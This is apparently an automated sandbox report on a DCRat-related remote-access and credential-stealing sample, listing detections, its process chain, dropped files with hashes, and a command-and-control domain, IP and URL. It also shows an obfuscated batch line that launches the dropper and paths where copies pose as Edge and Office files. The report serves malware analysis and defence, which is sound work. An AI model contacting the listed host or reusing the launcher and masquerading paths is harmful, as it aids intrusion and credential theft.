                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior

                                    Remote Access Functionality

                                    [Technique matrix. Columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact]
                                    Matrix entries that appear on their own line: Scripting; Windows Management Instrumentation; DLL Side-Loading; Disable or Modify Tools; OS Credential Dumping; System Time Discovery; Archive Collected Data; Encrypted Channel; Command and Scripting Interpreter; Process Injection; Deobfuscate/Decode Files or Information; File and Directory Discovery; Data from Local System; Non-Application Layer Protocol; Obfuscated Files or Information; System Information Discovery; Clipboard Data; Application Layer Protocol; Software Packing; Security Software Discovery; Process Discovery; Masquerading; Virtualization/Sandbox Evasion; Application Window Discovery; Remote System Discovery; System Network Configuration Discovery
                                    [Behavior graph] Behavior Graph ID: 1579116, Sample: 8k1e14tjcx.exe, Startdate: 20/12/2024, Architecture: WINDOWS, Score: 100
                                    Process chain: 8k1e14tjcx.exe -> wscript.exe -> cmd.exe -> ChainFontruntimeCrt.exe -> cmd.exe -> yeeQesPXxpnDuwPWqTnUoVbi.exe (the second cmd.exe also started conhost.exe, PING.EXE and chcp.com)
                                    Network: yeeQesPXxpnDuwPWqTnUoVbi.exe -> 703648cm.renyash.top, 37.44.238.250 (HARMONYHOSTING-ASFR, France)

                                    Source | Detection | Scanner | Label | Link
                                    8k1e14tjcx.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    8k1e14tjcx.exe | 100% | Avira | VBS/Runner.VPG |
                                    8k1e14tjcx.exe | 100% | Joe Sandbox ML | |

                                    Source | Detection | Scanner | Label | Link
                                    C:\Users\user\AppData\Local\Temp\KC0FFSqemJ.bat | 100% | Avira | BAT/Delbat.C |
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\Users\user\Desktop\HqZFZAkM.log | 100% | Avira | HEUR/AGEN.1300079 |
                                    C:\Users\user\Desktop\hgJAcPUI.log | 100% | Avira | TR/AVI.Agent.updqb |
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\Users\user\Desktop\sUnrMbPq.log | 100% | Avira | TR/PSW.Agent.qngqt |
                                    C:\Users\user\Desktop\ZXODDOCy.log | 100% | Avira | TR/PSW.Agent.qngqt |
                                    C:\Users\user\Desktop\xWHHAgmB.log | 100% | Avira | HEUR/AGEN.1300079 |
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe | 100% | Avira | VBS/Runner.VPG |
                                    C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\ChainagentComponent\ChainFontruntimeCrt.exe | 100% | Avira | HEUR/AGEN.1323342 |
                                    C:\Users\user\Desktop\PjjNTCHQ.log | 100% | Avira | TR/AVI.Agent.updqb |
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\HqZFZAkM.log | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\GFbXjJsj.log | 100% | Joe Sandbox ML | |
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\sUnrMbPq.log | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\ZXODDOCy.log | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\QZsVJdpt.log | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\xWHHAgmB.log | 100% | Joe Sandbox ML | |
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe | 100% | Joe Sandbox ML | |
                                    C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe | 100% | Joe Sandbox ML | |
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe | 100% | Joe Sandbox ML | |
                                    C:\ChainagentComponent\ChainFontruntimeCrt.exe | 100% | Joe Sandbox ML | |
                                    C:\ChainagentComponent\ChainFontruntimeCrt.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Program Files\Windows Security\BrowserCore\en-US\yeeQesPXxpnDuwPWqTnUoVbi.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Users\user\Desktop\GFbXjJsj.log | 29% | ReversingLabs | Win32.Trojan.Generic |
                                    C:\Users\user\Desktop\HZSnKfqJ.log | 25% | ReversingLabs | |
                                    C:\Users\user\Desktop\HqZFZAkM.log | 4% | ReversingLabs | |
                                    C:\Users\user\Desktop\MyEwMoxX.log | 17% | ReversingLabs | |
                                    C:\Users\user\Desktop\PjjNTCHQ.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Users\user\Desktop\QZsVJdpt.log | 29% | ReversingLabs | Win32.Trojan.Generic |
                                    C:\Users\user\Desktop\ZXODDOCy.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Users\user\Desktop\hgJAcPUI.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Users\user\Desktop\odxAFePx.log | 17% | ReversingLabs | |
                                    C:\Users\user\Desktop\otzSQnXU.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                                    C:\Users\user\Desktop\phDaBATS.log | 25% | ReversingLabs | |
                                    C:\Users\user\Desktop\sUnrMbPq.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Users\user\Desktop\xHFppYee.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
                                    C:\Users\user\Desktop\xWHHAgmB.log | 4% | ReversingLabs | |
                                    C:\Windows\AppReadiness\yeeQesPXxpnDuwPWqTnUoVbi.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    No Antivirus matches
                                    No Antivirus matches
                                    No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
703648cm.renyash.top | 37.44.238.250 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://703648cm.renyash.top/provider_cpugame.php | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
IP:37.44.238.250
Domain:703648cm.renyash.top
Country:France
ASN:49434
ASN Name:HARMONYHOSTING-ASFR
Malicious:true
                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1579116
                                                                                                                      Start date and time:2024-12-20 21:16:10 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 8m 15s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:15
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:8k1e14tjcx.exe
                                                                                                                      renamed because original name is a hash value
                                                                                                                      Original Sample Name:517d21cbe45c2a88930aa345c2a5c36b.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@18/267@1/1
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 33.3%
                                                                                                                      HCA Information:Failed
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.109.210.53, 92.122.16.236, 13.107.246.63
                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Execution Graph export aborted for target ChainFontruntimeCrt.exe, PID 7412 because it is empty
                                                                                                                      • Execution Graph export aborted for target yeeQesPXxpnDuwPWqTnUoVbi.exe, PID 7664 because it is empty
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • VT rate limit hit for: 8k1e14tjcx.exe
Time:15:17:27
Type:API Interceptor
Description:1670172x Sleep call for process: yeeQesPXxpnDuwPWqTnUoVbi.exe modified
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):185
                                                                                                                      Entropy (8bit):5.705570769600795
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:RDty8WxyEQmaRguy3Qicg/QNC7Oc2jz0YioKhD/HTzQqq/EPADncGuHLUSSYKWJS:JtvEzaR3iDQNC7gjWRf7q/Zc5tSW7QIO
                                                                                                                      MD5:9E15F87E4AD0A96F5D963F9F5E9E9AD1
                                                                                                                      SHA1:EF1FA65BF1968569E91A3690E1670B1C43ED57B1
                                                                                                                      SHA-256:AE66EA9288D159D051C8D762F12201C51F279FA50593D5B8261F85164F0F3FC0
                                                                                                                      SHA-512:7AF8A1AF32284F3D585E027B676EE485629AE2A677F9D3925E0CB17B65ED9D0EE77456554A69EE6A27C4335DCD8ED82010BB5A742406F4295DD26548089AC913
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:VjHek2FtWYYbt2Wa5CAXLraOdtkjJSWRKBhGpPWS23HwZ6yosg50Nm9oJ3A0SfkDBGQsVQvqpreSjoyh461nXgEiC26vOfAXSEvSpGScuOKfHqEfFc6Vo7peCspcU9cKrH9f3f2xoZ2IViaVybqwiosUYQQ6bzHvw9xArjmjjIrPFhJdRUo2TpmDY
                                                                                                                      Process:C:\Users\user\Desktop\8k1e14tjcx.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2043904
                                                                                                                      Entropy (8bit):7.572623220967923
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:McFZTdUJWxOOZPHst87uOLOkMRxJgSrSmMsc:MczpGWdZPHu9WuRx9rrJ
                                                                                                                      MD5:64105CB19AC25A6275C7D929937090A0
                                                                                                                      SHA1:4B0AB4A6FA17FEED05E183029F3A240D7860437D
                                                                                                                      SHA-256:CB2F1ACA28FCB0A43B1A256A1728A087EFED3D8144F0657C3DD5F4D5A0A6898C
                                                                                                                      SHA-512:7152D54DEF3FF633787549E7353330B949BB51AF3753B77A52B6FA24465CE635C985CBE28D7FC8ECBE4FE4E7B0B39933F79AD4E56817AAC45F8ABFFC0918E4B6
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                      Process:C:\Users\user\Desktop\8k1e14tjcx.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):252
                                                                                                                      Entropy (8bit):5.933375086181433
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:G7wqK+NkLzWbHnPv7qK+NkLzWHmRU7RLu2o2XFz3L/xgbOs:GyMCzWLnP/MCzWGRKdunAzb/0
                                                                                                                      MD5:82EA3A77040D884456B51FC284D887A3
                                                                                                                      SHA1:E5CABA4399CE043A758F78840D2323FFCE3D41B8
                                                                                                                      SHA-256:345CB6DB98F74263A91A2DABDE35F4D2AF5BBB909F1904D7B9B1D5D75864A2D8
                                                                                                                      SHA-512:79147CCBD6BAFBEEC3D7D21FC0E3F0F85CB340E54263B2925B42BBDA539D9F5B921D8E9DC950E51A7A1DA942AE75988A92470DAC6C6E73FDBEF76047EEFAFD91
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):136
                                                                                                                      Entropy (8bit):5.600859418421477
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:I0e2Ntn/iSMEty9ueQTZz5mXCuYWuJkTFNGAyk3NdBzWSy:I52NhisA9XGp5gCtxJ+Gq35A
                                                                                                                      MD5:8AE8FD13440CC8CC508102D6A192AB44
                                                                                                                      SHA1:D8EC9970FB497848041AAECC9C74AE23A444824D
                                                                                                                      SHA-256:540C463B6DA7191AF02D68D23994234420068D5B9C65FFEF34B2EC7CD02ACD67
                                                                                                                      SHA-512:6E00F075EC3E737FA50A3024A0FCCF0879BB9C1CF2B06953E7CB0E94405DA296B83DB166F9BF910D2AB9A121BB7171FF8BF44D79122108D79E60CEDEA6B7F974
                                                                                                                      Malicious:false
                                                                                                                      Preview:iBfrvMeDz1cvJhDYFv6VuYEIbGvZS28gKBKJL76JM2GoYi5BizaXHWXK6XPpbEu635lHW3NHzxI2SZt2Ku1cblYxoAMxrRsIHJvc7ypomTiUOf1hnWeqNSfRhxdVqZZhFAuInR5V
                                                                                                                      Process:C:\Users\user\Desktop\8k1e14tjcx.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):77
                                                                                                                      Entropy (8bit):4.7765908473935506
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:rZtAABNlioR6EqAsplLjvW9znAn:1tlgfhAs3f4s
                                                                                                                      MD5:21C1A26270A6AC361060EF54B50810BC
                                                                                                                      SHA1:11D3ABD6D008458760130E6FFCC61D812A976094
                                                                                                                      SHA-256:4E5619470E12D0F050C33E88F7075267812240FCF2F38E8732486EEA3967AC40
                                                                                                                      SHA-512:42FA950A07F5EDD1C48F6523395ED1816EE1B31EB9D8B905E3C92C31DEC692465862BFF4A840C845D879B1447593FFEFF5924FD0AB4206061DF257C2DC980AE8
                                                                                                                      Malicious:false
                                                                                                                      Preview:%kVPslLEx%%dsDm%..%mGYP%"C:\ChainagentComponent/ChainFontruntimeCrt.exe"%jwk%
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2043904
                                                                                                                      Entropy (8bit):7.572623220967923
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:McFZTdUJWxOOZPHst87uOLOkMRxJgSrSmMsc:MczpGWdZPHu9WuRx9rrJ
                                                                                                                      MD5:64105CB19AC25A6275C7D929937090A0
                                                                                                                      SHA1:4B0AB4A6FA17FEED05E183029F3A240D7860437D
                                                                                                                      SHA-256:CB2F1ACA28FCB0A43B1A256A1728A087EFED3D8144F0657C3DD5F4D5A0A6898C
                                                                                                                      SHA-512:7152D54DEF3FF633787549E7353330B949BB51AF3753B77A52B6FA24465CE635C985CBE28D7FC8ECBE4FE4E7B0B39933F79AD4E56817AAC45F8ABFFC0918E4B6
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Mg.................(...........F... ...`....@.. ....................................@..................................F..K....`.. ............................................................................ ............... ..H............text....&... ...(.................. ..`.rsrc... ....`.......*..............@....reloc..............................@..B.................F......H.......P...l...............*l...E.......................................0..........(.... ........8........E....8...9...........83...(.... ....8....(.... ....~d...{....9....& ....8....*(.... ....~d...{....:....& ....8........0.......... ........8........E....6.......*...........81......... ....~d...{....:....& ....8....r...ps....z*~....(7... .... .... ....s....~....(;....... ....~d...{....:q...& ....8f.......~....(?...~....(C... ....?.... ....~d...{....:0...& ....8%...~....:i
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2043904
                                                                                                                      Entropy (8bit):7.572623220967923
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:McFZTdUJWxOOZPHst87uOLOkMRxJgSrSmMsc:MczpGWdZPHu9WuRx9rrJ
                                                                                                                      MD5:64105CB19AC25A6275C7D929937090A0
                                                                                                                      SHA1:4B0AB4A6FA17FEED05E183029F3A240D7860437D
                                                                                                                      SHA-256:CB2F1ACA28FCB0A43B1A256A1728A087EFED3D8144F0657C3DD5F4D5A0A6898C
                                                                                                                      SHA-512:7152D54DEF3FF633787549E7353330B949BB51AF3753B77A52B6FA24465CE635C985CBE28D7FC8ECBE4FE4E7B0B39933F79AD4E56817AAC45F8ABFFC0918E4B6
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Mg.................(...........F... ...`....@.. ....................................@..................................F..K....`.. ............................................................................ ............... ..H............text....&... ...(.................. ..`.rsrc... ....`.......*..............@....reloc..............................@..B.................F......H.......P...l...............*l...E.......................................0..........(.... ........8........E....8...9...........83...(.... ....8....(.... ....~d...{....9....& ....8....*(.... ....~d...{....:....& ....8........0.......... ........8........E....6.......*...........81......... ....~d...{....:....& ....8....r...ps....z*~....(7... .... .... ....s....~....(;....... ....~d...{....:q...& ....8f.......~....(?...~....(C... ....?.... ....~d...{....:0...& ....8%...~....:i
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:ASCII text, with very long lines (449), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):449
                                                                                                                      Entropy (8bit):5.8435410682421045
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:3ZDCUnAJIMiZlsrvf1m79JYM9/ItfU5gv9mRvMPBYOIWpbBImkjuQWm2osFo69cT:HsIJTuv94fBIW5rk6nWp2m+WF5jiz
                                                                                                                      MD5:21BF69D6B8B053F2000B9665254BF27A
                                                                                                                      SHA1:9E58933FDC6AEF959A8EAFE7AF6DDADCF0F00335
                                                                                                                      SHA-256:66847EEBB842EB29B352F8F058E67DE2B99EA36083EA6BB27E7BA7F6A9DF1D60
                                                                                                                      SHA-512:51EB0AA7D33B15B94DE8F278BA35416B30C4277902DB00C432F339CE56A1BD98EF3055D60137C8690E32FAEB5FFAD0B08657307C96FE58BB3E5533F4D927F4ED
                                                                                                                      Malicious:false
                                                                                                                      Preview:qAvgUFJjQWVjKo4zE0axwMftsDGywEWQD3JcqTvIr6RnhiRotSBelhpdfCxR9UxL9FfQecJvFSGz51LKvcEdD1ogOq6nfdJWIGocCAKRJQYSazio1nfhQUHHa9CxffPlJuqzNsHvRxTxdVFYHSw28lFy8gBD7WvoAwJqItaIfuPcAUoE4oqNsXnho20qrEx5CpwqMZQX1oWNWnyo16JTqi5nIlCQ2ubb7UaUh82eYSVEAaKBEMzu4dOdtJhkXAfHM4QCNdG3Eo5XN1msaBLq5rgdF6lYaRHXxN1GKIykG5pQi0Q2gzJWyyMfXx7Q2scwghk99fiSNlk9BQ4Ops1lHvj8BWtWLhrXc2uAQR3BR1JMONdH2tkK11ou7m8mwLHp3MgJg37YzzUQmXty3mec7hfkN9DoTQOFudSBqUk8vLUBhYHk2JtKrosWq55g0TFil
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:ASCII text, with very long lines (425), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):425
                                                                                                                      Entropy (8bit):5.839719122552602
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:T5EE6CjKEb1ejlXJqN9rKy/PcRRQxdjTpQ4:NP6KKEiXJqvrjSYjTpQ4
                                                                                                                      MD5:5A5423B9CED9CC5CF0D3F0548F2BD48A
                                                                                                                      SHA1:F6A6DDB6F4E67B5DFE23CDAF99334A7F5670388F
                                                                                                                      SHA-256:EA4C57CB33E7CB5885686B7D072F6275867211090373AAA51A3BC8B463BB40B8
                                                                                                                      SHA-512:E96CAC449F61E746A93183CCD03626B4663E3800B694844786749D2E0611A10B847E79FD894A1AD6AAF680FBC23CCE44802503254D8A16CF9E021DEAC6965303
                                                                                                                      Malicious:false
                                                                                                                      Preview:oPyGNa7dP1HxpGLOcHXumCc9Unv388Lxr1pZEMcLF5ZPfcQQmCoO8AxmxzwjoEeQqUFxbwKQoMornMd1WfQ6U6zrDDmOZ3hBaIjLXdy01YkvWG9kW5MIxi6ueYtXK61vonQenSe3qaF5VDU7EB2eqYN1Lyq9ubp4hyGt0e6DaScXdAYbDwTIEWFQZYSylfJPuKYh6lHjEyDX50YKaO57HhzKt0UbLIc4JMnSm1fbptEQTrUjAHYXjLHNUOxFRpY6WIOtMGiiteSYcj1CfvbDtFV7Fa7YDZK9VH4KclW3jznF2tuvWvkgOUNRxQnwIKfTTTDVpqj3Yhe3bPFWpMBSznuB4mWM7juZUUviqZFqMqHqzTzhLRG6INeqiCaCTW6zwFiGegpQGVFIfDLkxyBpcyQHzFAo8CWzuS4uusDol
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2043904
                                                                                                                      Entropy (8bit):7.572623220967923
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:49152:McFZTdUJWxOOZPHst87uOLOkMRxJgSrSmMsc:MczpGWdZPHu9WuRx9rrJ
                                                                                                                      MD5:64105CB19AC25A6275C7D929937090A0
                                                                                                                      SHA1:4B0AB4A6FA17FEED05E183029F3A240D7860437D
                                                                                                                      SHA-256:CB2F1ACA28FCB0A43B1A256A1728A087EFED3D8144F0657C3DD5F4D5A0A6898C
                                                                                                                      SHA-512:7152D54DEF3FF633787549E7353330B949BB51AF3753B77A52B6FA24465CE635C985CBE28D7FC8ECBE4FE4E7B0B39933F79AD4E56817AAC45F8ABFFC0918E4B6
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Mg.................(...........F... ...`....@.. ....................................@..................................F..K....`.. ............................................................................ ............... ..H............text....&... ...(.................. ..`.rsrc... ....`.......*..............@....reloc..............................@..B.................F......H.......P...l...............*l...E.......................................0..........(.... ........8........E....8...9...........83...(.... ....8....(.... ....~d...{....9....& ....8....*(.... ....~d...{....:....& ....8........0.......... ........8........E....6.......*...........81......... ....~d...{....:....& ....8....r...ps....z*~....(7... .... .... ....s....~....(;....... ....~d...{....:q...& ....8f.......~....(?...~....(C... ....?.... ....~d...{....:0...& ....8%...~....:i
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:ASCII text, with very long lines (504), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):504
                                                                                                                      Entropy (8bit):5.88469223972919
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:pfhFWAY0FxE4nm+NamxtEjTmSx9HnHj3YXhtN:pJFDTrN5yjTHHDIXx
                                                                                                                      MD5:51BAFFB7E667FF4E0CC88BCA55A04BE6
                                                                                                                      SHA1:D3F5B9BA37C4D44AD8EF2E5F41394C75FAC5B06A
                                                                                                                      SHA-256:F4B7FD74AFE97E5E392045B51C5F03BC166F083B628391861802AEF8F26CE65A
                                                                                                                      SHA-512:FFB327F3114E2F3E39C27DD87C2212AF61025B1DFF80AB200492A674D2472E9CCBE1B4C1D9EC1E242E1CC4BC4091094ED409D8F7E07B46B12FBC96490F105048
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1179
                                                                                                                      Entropy (8bit):5.354252320228764
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHK2
                                                                                                                      MD5:074445AD437DEED8A22F11A846280CE2
                                                                                                                      SHA1:23025D83D7C33396A5F736FC6F9945976CFCD5D1
                                                                                                                      SHA-256:B7FD27029E12BE3B5C2C4010CC9C9BCB77CFE44852CC6EF4C3CED70740BB1CFD
                                                                                                                      SHA-512:440F8E77340A5C2F64BF97BC712193145F03AEDB86C0F5C849CA1AD0190E5621DDD7AE8104862383E31FFEC49CCF483CF2E4533C501B2606EE1D0FE66E865B6D
                                                                                                                      Malicious:false
